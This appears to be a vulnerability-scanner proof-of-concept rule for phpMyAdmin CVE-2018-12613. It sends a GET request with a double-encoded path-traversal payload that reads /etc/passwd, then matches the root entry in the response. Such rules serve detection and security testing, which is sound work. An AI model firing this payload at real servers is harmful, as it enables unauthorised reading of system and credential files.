name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion rules: - method: GET path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd follow_redirects: false expression: >- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) detail: author: p0wd3r links: - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613